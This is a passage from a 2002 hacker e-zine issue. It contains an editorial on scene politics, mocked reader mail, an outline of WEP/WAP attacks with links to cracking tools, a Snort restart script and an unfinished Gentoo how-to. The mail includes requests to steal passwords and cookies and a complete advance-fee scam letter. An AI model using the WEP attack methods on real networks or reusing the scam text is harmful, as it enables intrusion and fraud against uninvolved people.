-------------------------------------------------------------------------------- _ _ _ _ _ | | / ) | | | | (_)_ | | / / ____ ____ ____ | | | |___ ____ ____ ____ _| |_ _ _ | |< < / _ ) _ ) _ \ \ \/ / _ )/ ___) _ |/ ___) | _) | | | | | \ ( (/ ( (/ /| | | | \ ( (/ /| | ( ( | ( (___| | |_| |_| | |_| \_)____)____)_| |_| \/ \____)_| \_||_|\____)_|\___)__ | (____/ -------------------------------------------------------------------------------- I S S U E (12) L e g i o n s o f t h e U n d e r g r o u n d -------------------------------------------------[www.legions.org]-------------- [LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU] W W W . L E G I O N S . O R G [LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU] [CONTENTS]------------------------------------------------------------[CONTENTS] [1]==============================[Editorial - Digital Ebola ] [2]=====================================================[KV Spam - The Readers ] [3]============================[Hacking WAP/WEP - NtWaK0 ] [4]======[KV's 30 Second Scripting Solution - Digital Ebola ] [5]====[XMMS-Winamp How-To for Gentoo Linux - feach ] [6]===========================[Your Privacy and HP - b0ld ] [7]==============[Phone Phreaking Lives with AT&T - Cobra ] [8]==========[Security Method and Technique - Digital Ebola ] [9]==============[Java Virii - Archimedes ] [10]=========[The Scene Is Seen As Absolute Shit - 2dHero ] [11]================[Linux C Socket Programming - ??????? ] [12]======[Dallas Metroplex Wardriving Data - Digital Ebola ] [13]========================[Seattle Wardriving Data - pr00f ] [14]======[OpenSSH Update Script - Gridmark ] [15]==============================================[Random Rants - Random People] [16]========[Travel - Tips for Visiting Holland - Rewben ] [17]=================[Sex and Geeks Do Not Mix - Vecna ] [18]============================[Hey, Big Brother - Yarddog ] [19]=====[The Escalation to Economic Turmoil - OverDose ] [20]=====[How To Hack your Way Out Of A Paper Box - Kiddish ] [21]=========================[Delirious IDS - Digital Ebola ] [22]=====[Custom TCP Port Scanning using IP Sorcery - Case ] [23]=================[Business for Dummies - eDfGr33n ] [24]=============[The New Hackers Manifesto - Digital Ebola ] [25]======================================[SIGHUP - Legions of the Underground ] [LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU] W W W . L E G I O N S . O R G [LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU] -------------------------------------------------------------------------------- [Editorial]======================================================[Digital Ebola] -------------------------------------------------------------------------------- Ahh.. I put together almost half of this issue before thinking of a proper editorial for KV12. I am slipping in my old age... Lets see, the date of this editorials writing is 7-27-2002, it has been a LONG time since we released a Keen Veracity, and alot has happened. Lots of new legislation, lots of new antics by the RIAA and the MPAA.. now they seem to want a law that allows them to hack into your computer if they suspect you of pirating.. Stranger things have happened, but laughable all the same... Hmmm.. okay, let's be controversial. Right now, the way I see things, is there is a war in the "underground". On one side of the house, we have these so-called "whitehat" hackers. And on the otherside, we have these so called "blackhat" hackers. Basically, the blackhats are hacking the shit out of the whitehats, saying that the whitehats have soldout. This in its self is quite laughable. From what I see, the blackhats actually moonlight as whitehats. Alot of them do it for free, its their passion.. but they also do the same things for a living... no they may not be so apt to whore for attention on bugtraq, or whatever, but they are working in security all the same. At this point, its no longer a war with blackhat vs whitehat; rather its a "calling out" - the whores are being called out, some are shown for their actual skillsets, some are being shown in lies, and all skeletons are out of the closet. Some anarchy is always good for progress. Is this still what it seems? Maybe.. maybe not. Let me change subjects for a second... One of the many written gripes I have seen among the "underground" is that the security industry is driven by the script kiddies and the security companies... Yes, I would have to agree here. This is something akin to the window guy in NYC who had bad business, so he went down 5th avenue breaking out windows... Integrity in the industry is often questionable, and it has nothing to do with a background check, or who the person knows.. It's all about the Benjamins baby. Selling out is NOT doing what you love for a living. Selling out is NOT publishing you work. Selling out is NOT putting your all into your hobbie/profession; your heart, soul, blood, sweat and tears. No. Selling out is craving attention so bad, that you will sit down and write a "killer virus" - and then release it a couple weeks later... and THEN, "discover" it. THAT is selling out. I am not talking about just individules here.. but entire security companies... Selling out is discrediting your competitors thru illegal means so your company can get a piece of the pie. When a company issues "hits" against key individules in a security organization in order to de-throne that organizations market share... THAT is selling out. Of course, all of these examples are pure fiction.. none of this really happens... what was I talking about again? Oh.. I was getting ready to get on my OpenBSD rant. I love OpenBSD. Not for its "security model" but rather because its compact BSD that runs on a sparc. The "security" is a added feature, that according to some sources in the "industry/underground" was never a feature at all. I know of people that have possessed bugs and exploits for the OS that were never published. I know people that have gotten flame emails for finding problems. This is not security. This is madness. Let's get down to brass tacks. Everything can be hacked. Just because you say you havent had a remote exploit in X amount of years, doesn't mean it is so. Just because you say there isn't a problem, doesn't make it so. If you have a ego about it, you WILL be tested. You have to have complete integrity, hold nothing back, and have full disclosure. There is nothing wrong about being wrong, but the minute you refuse to accept your error, you are worse then being wrong; you have lost integrity. So, I guess this issue's editorial is a little off the wall, pay no attention, it is just me blowing off steam. All that I ask of the reader is to not forget why we all got started playing this game in the first place; because we love the game, and we love technology. Blessed is the person that can be paid to do what they love. By the way, selling out, IS SACRIFICING FULL DISCLOSURE FOR THE ALMIGHTY DOLLAR. With that mindless rant, I give you Keen Veracity 12. =) P.S. We will see everyone at Defcon X, this one is sure to be interesting! -------------------------------------------------------------------------------- [KV Spam]==========================================================[The Readers] -------------------------------------------------------------------------------- Date: Sat, 01 Sep 2001 03:33:12 EDT From: KASEAhmed@aol.com To: digiebola@hackphreak.org Subject: Hotmail Password Dear Friend, I have a life and death situation here but I need a password for nawrin_iqbal@hotmail.com. Can you please help me? Please get back to me as soon as possible. Sincerely, A Person In Need /* Well, considering I havent gotten back to you, I can only assume that someone has died. Our bad! */ *------------------------------------------------------------------------------* Date: Wed, 31 Jul 2002 11:43:24 +0000 From: kings town To: submit@legions.org Subject: urgent reply #20 BOTHA CRESCENT, SADTON,JOHANNESBURG, SOUTH AFRICA. kingstown417@hotmail.com Dear sir, In order to transfer out (USD 126 M) One hundred and twenty six million United States Dollars) from African Development Bank. I have the courage to ask you to look for a reliable and honest person who will be capable for this important business believing that you will never let me down either now or in future. I am MR.kings town,the Chief auditor of African Development Bank (ADB). There is an account opened in this bank in 1980 and since 1990 nobody has operated on this account again. After going through some old files in the records, I discovered that if I do not remit this money out urgently it would be forfeited for nothing. The owner of this account is Mr. Smith B.Andreas, a foreigner, and a miner at kruger gold co., a geologist by profession and he died since 1990. No other person knows about this account or any thing concerning it, the account has no other beneficiary and my investigation proved to me as well that this company does not know anything about this account and the amount involved is (USD 126M) One hundred and twenty six million United States Dollars million dollars. I want to first transfer USDM twenty six million United States Dollars from this money into a safe foreigners account abroad before the rest, but I don't know any foreigner. I am only contacting you as a foreigner because this money cannot be approved to a local bank here, but can only be approved to any foreign account because the money is in us dollars and the former owner of the account is Mr. Smith B.Andreas he is a foreigner too. I know that this message will come to you as a surprise as we don't know ourselves before. We will sign an agreement, but be sure that it is real and a genuine business. I only got your contact address from my secretary who operates computer, with believe in God that you will never let me down in this business. You are the only person that I have contacted in this business; so please reply urgently so that I will inform you the next step to take immediately. Send also your private telephone and fax number including the full details of the account to be used for the deposit. I want us to meet face to face or sign a binding agreement to bind us together so that you can receive this money into a foreign account or any account of your choice where the fund will be safe. And I will fly to your country for withdrawal and sharing and other investments. I am contacting you because of the need to involve a foreigner with foreign account and foreign beneficiary. I need your full co-operation to make this work fine because the management is ready to approve this payment to any foreigner, who has correct information of this account, which I will give to you later immediately, if you are able and with capability to handle such amount in strict confidence and trust according to my instructions and advice for our mutual benefit because this opportunity will never come again in my life. I need truthful person in this business because I don't want to make mistake I need your strong assurance and trust. With my position now in the office I can transfer this money to any foreigner's reliable account, which you can provide with assurance that this money will be intact pending my physical arrival in your country for sharing. I will destroy all documents of transaction immediately we receive this money leaving no trace to any place. You can also come to discuss with me face to face after which I will make this remittance in your presence and two of us will fly to your country at least two days ahead of the money going into the account. I will apply for annual leave to get visa immediately I hear from you that you are ready to act and receive this fund in your account. I will use my position and influence to effect legal approvals and onward transfer of this money to your account with appropriate clearance forms of the ministries and foreign exchange departments. At the conclusion of this business, you will be given 35% of the total amount, 60% will be for me, while 5% will be for expenses both parties might have incurred during the process of transferring. I look forward to your earliest reply. Yours truly, kings town /* Who doesnt get these? Okay.. we are all kings.. send us your dosh. */ *------------------------------------------------------------------------------* te: Wed, 17 Jul 2002 23:57:50 EDT From: XIXthLegion@aol.com To: submit@legions.org Subject: great name i like your name :) /* Thanks. So do I. */ *------------------------------------------------------------------------------* Date: Sun, 14 Jul 2002 02:45:09 +0800 (CST) From: Christine Hall Reply-To: Christine Hall To: submit@legions.org Subject: HTTP://LEGIONS.ORG Parts/Attachments: 1 OK 26 lines Text (charset: Unknown) 2 Shown 57 lines Text (charset: Unknown) ---------------------------------------- [ Part 1, Text/PLAIN (charset: Unknown "utf-8") 26 lines. ] [ Not Shown. Use the "V" command to view or save this part. ] [ The following text is in the "utf-8" character set. ] [ Your display is set for the "US-ASCII" character set. ] [ Some characters may be displayed incorrectly. ] Hi I visited HTTP://LEGIONS.ORG, and noticed that you're not listed on some search engines! I think we can offer you a service which can help you increase traffic and the number of visitors to your website. I would like to introduce you to TrafficMagnet.net. We offer a unique technology that will submit your website to over 300,000 search engines and directories every month. [img_tm.gif] [img_website.gif] [img_signup.gif] You'll be surprised by the low cost, and by how effective this website promotion method can be. To find out more about TrafficMagnet and the cost for submitting your website to over 300,000 search engines and directories, visit www.TrafficMagnet.net. I would love to hear from you. Best Regards, Christine Hall Sales and Marketing E-mail: christine@trafficmagnet.net http://www.TrafficMagnet.net This email was sent to submit@legions.org. I understand that you may NOT wish to receive information from me by email. To be removed from this and other offers, simply click here. /* Bitch, we didn't subscribe to your list. We don't want your service. You are just pissing us off. Stop it. */ *------------------------------------------------------------------------------* Date: Sun, 30 Jun 2002 17:38:58 -0700 (PDT) From: lady_alisha@yahoo.com To: submit@legions.org Subject: ?dunno how to name it Parts/Attachments: 1 OK 5 lines Text 2 Shown 1 lines Text ---------------------------------------- [ Part 1, Text/PLAIN 5 lines. ] [ Not Shown. Use the "V" command to view or save this part. ] this may sound verry unrealistic...lol but i thaught since this is a share knowledge someone could help me...hmmm absurde what i am doing lol.....or dunno i hope not.....i am searching for a way to get passwords on a g'damn site(www.audiogalaxy.com) is a pice of cake for someone who knows programming n stuff but for me is hell....spent the last 3 months searching the net for a way to steal ppls cookies or so....hmmm something....used to have a stupid pw guesser progr(huh pretty stupid lol).....but doesnt work anymore......n now hmmm i am on a dead line....thaugh maybe someone could help me....gimme some directions ...hmmm i dunno what else i could say..... ty for readding mynonsense... /* Please dont steal our cookies. We have to eat! WE NEED THOSE COOKIES! */ ________________________________________________________________________________ Do You Yahoo!? Sign-up for Video Highlights of 2002 FIFA World Cup *------------------------------------------------------------------------------* Date: Sun, 19 May 2002 16:26:12 -0400 From: James Dearborn <-oilandgasremoval@aol.com> To: submit@legions.org Subject: ADV Oil and Gas Investment [ The following text is in the "iso-8859-1" character set. ] [ Your display is set for the "US-ASCII" character set. ] [ Some characters may be displayed incorrectly. ] How would you like a 100% tax free Investment in Oil and Gas wells? Make over 100% annually and receive monthly tax free Income with very low risk. Email your name, address, and phone number to oilandgaspackage@aol.com and we will send you the information. =======================DISCLAIMER========================== This is Not spam as you and I belong to the Free-Email-List. To be removed Put "Please remove me and your email address" in the subject line. Then send it to: oilandgasremoval@aol.com ***YOU MUST put your email address in the subject line to be Removed, =========================================================== /* This is spam. Fuck off. We didn't sign up on your list. This is the submissions account for a bunch of pissy people and your stupid schemes are pissing us off more. */ *-----------------------------------------------------------------------------* Date: Wed, 27 Feb 2002 23:16:57 +0000 From: Haqa .. To: submit@legions.org hi is this the L.O.U, coz if it is u guys are cool, i think u guys ohh sorry gals if any (i dont know maybe) are soo spot on i show that whitepower website u did over and i think u lot r cool and all the respect goes out to u. *********************amjad ali***************************** /* Thanks. Did we fall into a timewarp or something? */ *-----------------------------------------------------------------------------* From: LB680KBR@aol.com To: submit@legions.org Subject: Cell Phone Parts/Attachments: 1 OK 7 lines Text 2 Shown 4 lines Text ---------------------------------------- [ Part 1, Text/PLAIN 7 lines. ] [ Not Shown. Use the "V" command to view or save this part. ] Hi, I read in the monthly magazine about a cell phone service offered to members. The article said for more information to check the web site. I have looked and can't find anything about it. Please e-mail me this information or the site to check. Thanks R. E. Marlar /* Please re-read. We offer no such service. Of course, for a phenominal fee... */ *-----------------------------------------------------------------------------* Date: Tue, 13 Nov 2001 11:08:08 +0000 From: Pamela O'Shea <9843981@student.ul.ie> To: submit@legions.org Subject: ipsorc.1.0.tar.gz Hi, I am wondering where I could download ipsorc.1.0.tar.gz please ? as I'm writing an automated tool for testing firewalls and am interested in your packet generator. Its really nice that you have TTL :) My tool will try and throw all sorts of variations on the firewall by default or the administrator can choose what packets to form for the test. I am hoping to compelety automate it, ie. to go from writing the security policy to testing using a designed language, so it would be great to try out your packet generator Regards, P. O'Shea /* There is a link on www.legions.org, as well as www.legions.org/~phric/ */ *----------------------------------------------------------------------------* Date: Sat, 13 Oct 2001 14:48:44 +1100 From: BwY BwY To: submit@legions.org Subject: survey PS you guys 0wn Legions of the Underground member/regular/luser survey. Legions Survey made possible because WGMATATS Tip: if you dont answer all the questions you will be savagely beaten to a bloody pulp by Gridmark and Phriction. Thank you and Enjoy! 1. Do you know you know what WGMATATS stands for? nope 2. What is your favorite unsigned long int? not sure 3. What is your handle?(alias,nickname,AKA) BwY 4. What is the origin of your handle?(where did you get it from) My initials(shhh dont tell anyone) 5. Who in legions do you think is the most likely to get arrested and for what? Dont know, just traveled along to here 6. BeOS or MacOS? BeOS, MacOS sux0rs 455 7. touch or finger? finger 8. telnet or ssh? telnet 9. Do most of the people you know refer to you by your handle? no 10. What is your favorite protocol? tcp/ip 12. Favorite Daemon? firewall 13. Usual bathroom reading? learn c in 21 days 14. Have you ever had sex with someone who could code Hello world in assembly language? not yet 15. Binary? not yet 16. Do you own a pair of keys to a local ATM machine? i wish i did 17. Do you know what a scenewhore is? hell yeah 18. Are you one? hell no 19. What must someone do to be elite? act cool, h4x0r, use linux, 0wn winblowz boxes 20. Have you ever tried to nuke someone? hell yeah 21. Do you have a root dance? not yet 22. Have you ever owned a box stoned? or drunk? not unless drunk on mtn dew counts ;) 23. Have you ever wrote root@127.0.0.1 as your address on a job application? not yet, but good idea 24. Have you ever rooted yourself? yup 25. Favorite book? learn c in 21 days 26. Favorite Car? nissan 300zx twin turbo, year 1990 27. Favorite color? red 28. Do you look at mullet porn? nope 29. Mountain Dew || Coffee? Mountain Dew 30. Multiple Choice Section Just fill in the _'s with x's if you dont get it you suck. Do you think this Survey is a threat to your security? _[3y3 pj33r] x[no... dumbass] Do you take large amounts of caffene and then lie about it the next day? _[Admitted Addict.] x[no, and im stickin to it] Do you have a 1Mbit+ connection running to your house? _[yep] x[nien] Do you have more than 10 computers in any one room of your house? x[si] _[no] Do you run around your house with a lampshade on your head sayin "Hi! ima squid!"? _[yay] x[nay] What are your "m4d sk1llz y0h"? x[i r00t stuff] _[skript kid] _[clubie crackhead fucknut] _[whats a computer?] What is your current rate of income? _[Under 10,000] _[11,000+] _[50,000+] _[100,000+] _[31,337] x[None of your fucking business Gridmark.] How much time do you "use" playing games? x(approx. 22 hrs a day, rest is spent making people ph34r m3)[hrs] Do you use 31337'isms? x[y34 b1z47ch] _[No sir] Do you have MtDew cans flying at your head blindingly fast? (i.e. commercial) _[WATCH OUT!] x[whatchu talkin bout willis?] Do you like me? x[i lub j00] _[fsck you bitch] Are you a chick? _[yea baby] x[3y3 41nt gn0 ch1x0r] *//////////////* */ Sorry, /* How much do you like me? x[this is] x[getting tedious] */ I'm Lonley /* *//////////////* if [$lastquestion == yes]; then "can i r00t you?" x[no way in hell Gridmark.] Sexiest stooge? Larry or Moe? _[larry] _[moe] _[shemp] x[nuyk nuyk] Are you bored yet _[zzzzz] x[CMON MAN KEEP GOING] Who selected the second answer to the last question? _[not me] _[not me] x[me] EOF /* FREAK! FREAK! FREAK! */ -------------------------------------------------------------------------------- T H I S S P A C E F O R R E N T -------------------------------------------------------------------------------- [Hacking WAP/WEP]================================[NtWaK0 ] -------------------------------------------------------------------------------- ---------------------------------------------- ---> Hacking WAP/WEP NtWaK0 @ Legions.org <--- ---------------------------------------------- ## #### #### ###### # # # # # # ## # ## ## # # # ## # # ## ##### #### ### ## ## # # ## ## ### ### #### ---------------------------------------------- ---> Hacking WAP/WEP NtWaK0 @ Legions.org <--- ---------------------------------------------- HTML MAP can be found at www.safehack.com/textware/kvwak0.htm MS word doc can be found at www.safehack.com/textware/kvwak0.htm ---------------------------- ---> 1 Standards Groups <--- ---------------------------- 1.1 IEEE 1.1.1 IEEE 802.11 o Published in June 1997 o Approved as an IEEE standard June 2001 o 2.4GHz operating frequency o 1 to 2 Mbps throughput o 802.1X ~SNetwork Port Authentication~T o CSMA/CA instead of Collision Detection o Carrier Sense Multiple Access/Collision Avoidance o WLAN adapter cannot send and receive traffic at the same time o Hidden Node Problem o Four-Way Handshake ---> 802.1X Topologies <--- o Per-Station unicast session keys o 1. Keys derived on client and the RADIUS server o 2. RADIUS server transmits key to access point o 3. Unicast keys can be used to encrypt subsequent traffic o Per-Station unicast session keys not required o What is ad-hoc networking? o 1. Station communicating directly with other stations o 2. All stations authenticate with each other o 3. RADIUS not used in ad-hoc mode o 4. Key Management o 1. Password-based mutual authentication o 2. Secure key generation o 3. EAP-TLS: supports mutual authentication, keying o 4. EAP-TLS assumes both participants have a certificate o 5. EAP-TLS does not assumes client and server o 5. Issues with Adhoc o 1. Multiple interconnections to destinations o 2. Hidden stations o 3. Loops in the network ---> IEEE 802.11a <--- o Also published in late 1999 as a supplement to 802.11 o Operates in 5GHz band (less RF interference than 2.4GHz range) o Users Orthogonal Frequency Division Multiplexing (OFDM) o Supports data rates up to 54 Mbps o 802.11a and 802.11b work on different frequencies ---> IEEE 802.11b WEP <--- o Published in late 1999 as supplement to 802.11 o Access Point gateway to wired network o 11 channels o Still operates in 2.4GHz band o 2.4 GHz, 25 MHz per channel o Data rates can be as high as 11 Mbps o 11 Mbits/sec (actually 5 Mbits/sec data throughput) o Only direct sequence modulation is specified o Coverage range will decrease as MB increases o Most widely deployed today o 802.11b will start at 11MB and will decrease to 5.5MB, 2MB, and 1MB o Two levels of encryptions o 1. 40-bit key (aka, silver, 64-bit) o 2. 104-bit key (aka, gold, 128-bit) o Encryption key and Initialization Vector o 1. IVs taken from 2^24 range o 2. IV is transmitted clear o 3. Key is not transmitted ---> IEEE 802.11e Quality of Service <--- o Currently under development o Working to improve security issues o Extensions to MAC layer, longer keys, and key management systems o Adds 128-bit AES encryption ---> HiperLAN/2 <--- o Development led by the European Telecommunications Standards Institute (ETSI) o Operates in the 5 GHz range, uses OFDM technology o Support data rates over 50Mbps like 802.11a o HiperLAN/2 is not interoperable with 802.11a or 802.11b ---> 802.11f Inter-Access Point Protocol <--- ---> 802.11i Extended security <--- ---> 802.1w Spanning tree rapid convergence <--- ---> Packet Structure <--- o Ethernet Packet Structure o 14 byte header o 2 addresses o 802.11 Packet Structure o 30 byte header o 4 addresses o Ethernet Physical Layer Packet Structure o 8 byte header (Preamble) o 802.11 Physical Layer Packet Structure o 24 byte header (PLCP, Physical Layer Convergence Protocol) ---> 802.1X authentication in 802.11 <--- o IEEE 802.1X authentication occurs after 802.11 association or reassociation o Association/Reassociation serves as ~Sport up~T within 802.1X state machine o If 802.1X authentication succeeds, access point removes the filter o 802.1X messages sent to destination MAC address o Client, Access Point MAC addresses known after 802.11 association o Access point only accepts packets with source = Client and Ethertype ------------------ ---> 1.2 IETF <--- ------------------ 1.2.1 RADIUS & AAA o Authentication o Authorization o Accounting 1.2.2 PPPEXT (EAP) o Extensible Authentication Protocol 1.2.3 IPsec and IPSRA IPsec and VPNs ------------------------ ---> 2 What is WAP? <--- ------------------------ ---> 2.1 Basic <--- ---> 2.2 HTTP/HTML adjusted to small devices <--- ---> 2.3 Consists of o 2.3.1 Network architecture o 2.3.2 Protocol stack ---> WAP Transport Layer WDP <--- o An adaptation layer to the bearer protocol o Source and destination address and port o Optionally fragmentation o Maps to UDP for IP bearer ---> WAP Security Layer WTLS <--- o TLS adapted to the UDP-type usage by WAP o Encryption and authentication o Several problems identified ---> Vulnerabilities within the Wireless Application Protocol <--- http://www.sans.org/infosecFAQ/wireless/WAP.htm o 1. Weak MAC o 2. RSA PKCS#1 o 3. Unauthenticated alert messages o 4. Plaintext leaks ---> WAP Transaction layer WTP <--- o Three classes of transactions o 1. Class 0: unreliable o 2. Class 1: reliable without result o 3. Class 2: reliable with result o No security elements at this layer o Protocol not resistant to malicious attacks ---> WAP Session Layer WSP <--- o Meant to mimic the HTTP protocol o No mention of security in spec except for WTLS o Distinguishes a connected and connectionless mode o Connected mode is based on a SessionID given by the server ---> WAP Application Layer WAE <--- 2.3.3 Wireless Markup Language (WML) o WML based on XML and HTML o Not pages of frames, but decks with cards o Images: WBMP, WAP specific o Generally all compiled to binary by WAP gateway ---> Additional area of potential problems o The WAP Javascript equivalent o Located in separate files o Also compiled by WAP gateway o Allows automation of WML and phone functions ---> 2.4 WAP Infrastructure issues <--- ---> 2.4.1 Attacking a dialed in phone <--- ---> 2.4.2 Spoofing another dialed in phone <--- ---> 2.4.3 Attacking the gateway <--- ---> 2.4.4 Collusion attack <--- ------------------------ ---> 3 What is EAP? <--- ------------------------ o 3.1 Extensible Authentication Protocol (RFC 2284) o 3.2 Provides a flexible link layer security framework o 3.3 Simple encapsulation protocol o 3.3.1 No dependency on IP o 3.3.2 ACK/NAK, no windowing o 3.3.3 No fragmentation support o 3.4 Few link layer assumptions o 3.4.1 Can run over any link layer (PPP, 802, etc.) o 3.4.2 Does not assume physically secure link o 3.5 Assumes no re-ordering o 3.6 Can run over lossy or lossless media o 3.7 EAP methods based on IETF standards o 3.7.1 Transport Level Security (TLS) o 3.7.2 Secure Remote Password (SRP) o 3.7.3 GSS_API (including Kerberos) ------------------------- ---> 4 What is WEP ? <--- ------------------------- ---> 4.1 Introduction <--- ---> 4.1.1 All users of a given access point share the same encryption key ---> 4.1.2 Data headers remain unencrypted so anyone can see the source and dest ---> 4.2 Attacks Against WEP <--- o Passive attacks to decrypt traffic based on statistical analysis. o Active attack to inject new traffic. o Active attacks to decrypt traffic, based on tricking the access point. o Dictionary-building attack ---> 4.2.1 War Driving <--- o Default installation allow any wireless NIC to access the network o Drive around (or walk) and gain access to wireless networks o Provides direct access behind the firewall o Heard reports of an 8 mile range using a 24dB gain parabolic dish antenna ---> 4.2.2 Rogue Networks <--- o Network users often set up rogue wireless LANs to simplify their lives o Rarely implement security measures o Network is vulnerable to War Driving and sniffing and you may not even know it ---> 4.2.3 Policy Management <--- o Access is binary o Full network access or no network access o Need means of identifying and enforcing access policies ---> 4.2.4 MAC Address <--- o Can control access by allowing only defined MAC addresses o Only wireless card with listed MAC address can be served o This address can be spoofed o Must compile, maintain, and distribute MAC addresses to each access point o Not a valid solution for public applications o Unfortunately, MAC addresses are also sent clear in the air o Wireless card MAC address clone ---> 4.2.5 Service Set ID (SSID) <--- o Only person who know SSID can be served o SSID is the network name for a wireless network o WLAN products common defaults: 101 for 3COM and tsunami for Cisco o Can be required to specifically request the access point by name o The more people that know the SSID, the higher the likelihood it will be missused. o Changing the SSID requires communicating the change to all users of the network o Unfortunately, SSID is broadcasted in the clear ---> 4.2.6 IV (key) reuse <--- Lack of replay protection allows IV values to be reused Collisions made possible by small IV space in WEP Enables statistical attack against ciphertexts with replayed IVs ---> 4.2.7 Known plaintext attack <--- Lots of known plaintext in IP traffic: ICMP, ARP, TCP ACK, etc. Can send pings from Internet through AP to snooping attacker Enables recovery of key stream of length N for a given IV [Arbaugh] Enables statistical attack and recovery of Key with known IVs [Fluhrer] ---> 4.2.8 Partial known plaintext <--- May only know a portion of the plaintext (e.g. IP header, SNAP) Possible to recover M octets of the keystream, M < N Statistical analysis of plaintext and IV shows keystream bias [Shamir] Statistical analysis of plaintext and IV allows Key recovery [Fluhrer] Via repeated probing, can extend keystream from M to N [Arbaugh] ---> 4.2.9 CRC32 <--- Linearity of algorithm and absence of Key use allows for forgery Possible to flip bits in realtime, adjust CRC32 and cause denial of service ---> 4.2.10 Authentication forging <--- o WEP encrypts challenge using IV chosen by client o Recovery of key stream for a given IV enables re-use ---> 4.2.11 Denial of service <--- ---> 4.2.12 Dictionary attack <--- ---> 4.2.13 Realtime decryption <--- ---> 4.2.14 Passive Attack to Decrypt Traffic <--- The first attack follows directly from the above observation. A passive eavesdropper can intercept all wireless traffic, until an IV collision occurs. By XORing two packets that use the same IV, the attacker obtains the XOR of the two plaintext messages. The resulting XOR can be used to infer data about the contents of the two messages. IP traffic is often very predictable and includes a lot of redundancy. This redundancy can be used to eliminate many possibilities for the contents of messages. ---> 4.2.15 Active Attack to Inject Traffic <--- The following attack is also a direct consequence of the problems described in the previous section. Suppose an attacker knows the exact plaintext for one encrypted message. He can use this knowledge to construct correct encrypted packets. The procedure involves constructing a new message, calculating the CRC -32, and performing bit flips on the original encrypted message to change the plaintext to the new message. The basic property is that RC4(X) xor X xor Y = RC4(Y). ---> 4.2.16 Active Attack from Both Ends <--- The previous attack can be extended further to decrypt arbitrary traffic. In this case, the attacker makes a guess about not the contents, but rather the headers of a packet. This information is usually quite easy to obtain or guess; in particular, all that is necessary to guess is the destination IP address. Armed with this knowledge, the attacker can flip appropriate bits to transform the destination IP address to send the packet to a machine he controls, somewhere in the Internet, and transmit it using a rogue mobile station. ---> 4.2.17 Table-based Attack <--- The small space of possible initialization vectors allows an attacker to build a decryption table. Once he learns the plaintext for some packet, he can compute the RC4 key stream generated by the IV used. This key stream can be used to decrypt all other packets that use the same IV. Over time, perhaps using the techniques above, the attacker can build up a table of IVs and corresponding key streams. This table requires a fairly small amount of storage (~15GB); once it is built, the attacker can decrypt every packet that is sent over the wireless link ------------------- ---> 5 Threats <--- ------------------- ---> 5.1 Loss of Confidentiality <--- o 5.1.1 Competitors o 5.1.2 Thieves o 5.1.3 Disruptors ---> 5.2 Identity Hijack ---> 5.3 Disruption of Functionality o 5.3.1 Viruses o 5.3.2 Trojan Horse o 5.3.3 Data Integrity ---> 6 Notes/Links o 6.1 Ports used by Wireless App o 6.1.1 Wap-wsp:9200/tcp WAP connectionless session service o 6.1.2 Wap-wsp:9200/udp WAP connectionless session service o 6.1.3 Wap-wsp-wtp:9201/tcp WAP session service o 6.1.4 Wap-wsp-wtp:9201/udp WAP session service o 6.1.5 Wap-wsp-s:9202/tcp WAP secure connectionless session service o 6.1.6 Wap-wsp-s:9202/udp WAP secure connectionless session service o 6.1.7 Wap-wsp-wtp-s:9203/tcp WAP secure session service o 6.1.8 Wap-wsp-wtp-s:9203/udp WAP secure session service ---> 6.2 Links o 6.2.1 WAP Wireless Certificate See document: http://www.verisign.com/support/tlc/wap.htm o 6.2.2 IETF web page See document: http://www.ietf.org/ o 6.2.3 IEEE 802 web page See document: http://grouper.ieee.org/groups/802/dots.html o 6.2.4 Unofficial 802.11 Security See document: http://www.drizzle.com/~aboba/IEEE/ o 6.2.5 WAP Server Certificates See document: http://www.entrust.net/wapserver/index.htm o 6.2.6 WEP Faq See document: http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html o 6.2.7 WAP Forum See document: http://www.wapforum.org/what/technical.htm o 6.2.8 WAP Development Tools See document: http://www.palowireless.com/wap/devtools.asp o 6.2.9 Adventures In Wardriving See document: http://www.athomeprd.com/~jimb/wardriving/index.html o 6.2.10 Capture and Crack utilities See document: http://Www.airsnort.shmoo.com See document: http://www.airsnort.shmoo.com/ See document: http://www.dachb0den.com/ See document: http://www.netstumbler.com/ See document: http://telia.dl.sourceforge.net/sourceforge/wepcrack/WEPCrack-0.0.10.tar.gz See document: http://www.personaltelco.net/index.cgi/WirelessSniffer -------------------- ---> References <--- -------------------- www.blackhat.com http://www.google.ca/search?q=wardriving+*.ppt&hl=en&ie=UTF-8&oe=UTF-8 http://airsnort.shmoo.com http://www.athomeprd.com/~jimb/wardriving/index.html http://www.blackbeltjones.com/warchalking http://www.boulderlabs.com/vulnerable.ppt ---------------------------------------------- ---> Peace to you all:all from NtWaK0 <--- ---> www.safehack.com <--- ---> www.legions.org <--- ---------------------------------------------- -------------------------------------------------------------------------------- [KV's 30 Second Scripting Solution]==========[Digital Ebola ] -------------------------------------------------------------------------------- Ever wish Snort would start itself after it dies? Drop this into your crontab, and never worry about starting it again... /bin/go is your Snort init script. Customize to taste. Works under Debian. #!/bin/bash SNORT=`ps ax | grep snort | grep -v grep|awk '{print $1}'` if [ -x $SNORT ]; then /bin/go > /dev/null date >> /var/log/snort-health.log echo Snort Restarted by Daemon >> /var/log/snort-health.log echo ----------------------------- >> /var/log/snort-health.log echo else echo Snort up. > /dev/null fi -------------------------------------------------------------------------------- [XMMS-Winamp How-To for Gentoo Linux]========[feach ] -------------------------------------------------------------------------------- Ok so you want to run Winamp plugins with XMMS on your Gentoo system? First thing first. If you do not have wine installed you will need to install it # emerge --clean rsync;emerge wine If you have a older version of wine then # emerge --clean rsync;emerge -u wine After thats all done, You will need to download this plugin ( I am assuming you already have XMMS ) http://www.emulinks.de/xmms-winamp/xmms-winamp-0.4.tar.gz You will need to extract the files and cd into the plugin source directory $ tar xvfz xmms-winamp-0.4.tar.gz;cd xmms-winamp-0.4 Then edit the configure file $ nano -w configure Change line 5 to ( You can find what line your at by pressing Ctrl+c ) for i in /usr/wine/bin Then Change line 30 to for j in "" -L/usr/wine/lib Then change line 46 to for i in /usr/wine/include Then change line 64 to for i in 